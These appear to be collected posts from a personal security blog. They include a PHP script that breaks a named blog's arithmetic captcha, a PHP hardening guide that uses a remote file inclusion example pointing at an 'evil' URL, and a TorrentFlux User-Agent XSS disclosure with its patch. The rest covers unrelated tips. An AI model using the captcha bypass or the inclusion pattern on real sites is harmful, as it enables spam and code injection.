Today, I still don’t remember how I got to this blog post but anyway I saw that they had a text based captcha.

The blog author claims that it prevents spam, which it does! Because it added an extra layer of uniqueness to his code and unintelligent spam bots don’t realise. Anyway now for the breaking:

//Break Text Based Captcha:
$regex = ‘#/>\s+

\s+
$page = getpage(’http://pooteeweet.org/blog/259/p/1′);

preg_match($regex, $page, $matches);
$n1 = intval($matches[1]);
$n2 = intval($matches[3]);

$op = $matches[2];

switch ($op) {
case ‘+’:
$INTresult = intval($n1+$n2);
break;

case ‘-’:
$INTresult = intval($n1-$n2);
break;

case ‘/’:
$INTresult = intval($n1/$n2);
break;

case ‘*’:
$INTresult = intval($n1*$n2);
break;

default:
die(’Illegal Operation’);
break;
}

echo $INTresult;
?>

Note that my framework has a function getpage which is just a simple (well quite advanced actually…) curl function.

There you have it $INTresult is the answer to the math problem.

Yes this is a very simple text captcha but breaking a more advanced one wouldn’t require that much more effort.

Regards,

Steven Roddis

I get a lot of questions regarding how to increase security in their PHP App.

Aside from the obvious, write secure code; there are two easy “switches that you can flick”.

Disable: URL fopen wrappers

This will prevent most exploitations of the classic File Inclusion Vulnerability.

eg. include($foo.’bar.php’);

Now if $foo is set to ‘http://www.stevenroddis.com/evil?’

The script grabs PHP code from “http://www.stevenroddis.com/evil?bar.php”

But if URL fopen wrappers if off, then the hacker can only use files on your server. (Still with limitations such as the appending string)

However there is a downside to this some applications may use url wrappers to download data off the web, you can work around it by using curl, but you might not want to.

How?

php.ini (most people won’t have access to this)

allow_url_fopen off

.htaccess

php_flag allow_url_fopen off

Turn Off: Register Globals

Yes, it is off by default but the number of sites that get hacked due to it being on is astounding. Register Globals is not needed in 99.99% of PHP apps.

How?

php.ini (most people won’t have access to this)

register_globals off

.htaccess

php_flag register_globals off

#3 Bonus: Turn off Error Reporting

A lot of sites show sensitive information can make it easier to find a security hold and/or exploit it.

How?

php.ini (most people won’t have access to this)

display_errors Off

.htaccess

php_flag display_errors Off

Enforce these in your web app:

Don’t let stupid configuration changes bring down your defences, inside your php application make sure you die() and give some [nice] error, when say register globals is turned back on.

Code:

if (@ini_get(’register_globals’))
{
die();
}

You might want to do it also for allow_url_fopen (replace “register_globals” in the above with “allow_url_fopen”).

There you have it two (well four) easy and simple steps to greatly increase security in your PHP application. (Three of them don’t require changing your code)

Regards,

Steven Roddis

After forgetting to add “2>&1″ to the end of my cron job that runs every minute I ended up with a lot of “mail” in my Maildir, about 600,000! So I thought that I could do a simple “rm 11*” (Each file started with a 11)

But I ran into a problem: “Argument list too long.”

So after researching this problem I found out why (It has to do with not being able to fit the supplied argument list and environment into the 128K buffer)

I also found a solution: find . -name ‘11*’ | xargs rm

Three minutes later my Maildir was clear!

Regards,

Steven Roddis

Name: TorrentFlux User-Agent XSS Vulnerability
Published: 2006-10-06
Critical Level: Moderate
Type: Cross-Site Scripting
Where: Remote
Status: 0-Day
Software: Torrentflux 2.1
Discoverer: Steven Roddis (http://www.stevenroddis.com)

I gave the authors of this product a week (more than usual) just to contact me, they have failed to do so; so I am releasing this vulnerability publicly!

/admin.php

Line: 325

$ip_info = $ip_resolved.”
“.$user_agent;

Useragent is not esacped.

Solution:

Edit source code:

/admin.php

Line: 325:

$ip_info = htmlentities($ip_resolved, ENT_QUOTES).”
“.htmlentities($user_agent, ENT_QUOTES);

Yes, it isn’t a Y2K Bug per se…

This shows that there are some stupid people out there:

Note what is really happening is str = ‘19′+’106′;

Two things come to mind:

a) They stole some really, really, really old code

b) They are just plain stupid!

Well it turns out that it was b):

The code:

<script language=”JavaScript1.2″>
var mydate=new Date()
var year=mydate.getYear()
if (year<2000) year=”19″+year var day=mydate.getDay() var month=mydate.getMonth() var daym=mydate.getDate()
if (daym<10) daym=”0″+daym var dayarray=new Array(”Sun”,”Mon”,”Tues”,”Wed”,”Thur”,”Fri”,”Sat”)
var montharray=new Array(”January”,”February”,”March”,”April”,”May”,”June”,”July”,”August”,”September”,”October”,”November”,”December”)
document.write(”<font size=”2″ face=”Arial” color=”#000000″>”+dayarray[day]+”, “+montharray[month]+” “+daym+”, “+year+”</font>”)

The problem was that they wrote if(year<2000). The year is the number of years after 1900.

So it should be:

year = year+1900

Problem Fixed! (It was just really funny to see it, in this day and age! :) )

Steven

If any of you have tried to enable caching because when you site hits the frontpage, you site just can’t handle the traffic.

The WP-Cache for Wordpress is an excellent option for PHP 4 and a almost perfect option for PHP 5 with one tiny exception. The Blank Page of Doom. Fortunately there is an extremely easy fix.

Edit: /wp-content/plugins/wp-cache/wp-cache-phase2.php

And do a simple find and replace on:

Find: ob_end_clean(); Replace: ob_end_flush();

This is because WP-Cache was built for PHP 4.

Now enjoy the blazing fast speed WP-Cache provides!

Regards,

Steven Roddis

After not being bothered to update my weblog, I have decided to update it…

I have moved everything to a different server and enabled caching, which will mean a lot faster page loading!

So what is in store??

Hacks, cracks, and exploits; (Well Hacks and Exploits) Only the legal stuff such as laser audio transmitters and the liking (old school hacking). And exploits, however I have a policy of notifying the producers of the flawed product, if they don’t respond or don’t fix it in enough time. (eg. File inclusion = ~ 3 days). Then the exploit gets released publicly. If the author of the product genuinely needs more time, then upon assessment they may be given it. So you will only see it after the conditions above are met.

Regards,
Steven Roddis

Users fill out many forms day, whether it is just loging-in, signing-up or something else the user has to repeditivly enter in his or her infomation. The worst example that I have found is Microsoft, lets look at the steps to get a free usb drive from them. (The same thing applies to pretty much, if not all forms that Microsoft has.) You need to sign in with your passport. Ok, I have entered all the infomation except for the answers to the questions, many times before, so why can’t they just ask me for the answers insted of asking me for everything again. I have seen some sites where they try to help you either by having a checkbox that you can check to say if your billing is the same as your postal address, or you get the same big form but some of the info that they already have on you is there. Lets start with the first thing in that sentence: the checkbox to say that your billing is the same as your postal. The problem I have with some of the site. Is that I paid via PayPal, and see no need for a billing address. Thurermore, I am contantly asked for my phone number, (as a required field) but I see no reason for them to ring me. An example is an online advertising company, who asked me for my phone number. (I was a publisher with them) But I could never see them calling me, as they had my email, and I live in Australia so it would cost a bit more for a call… Read the rest of this entry »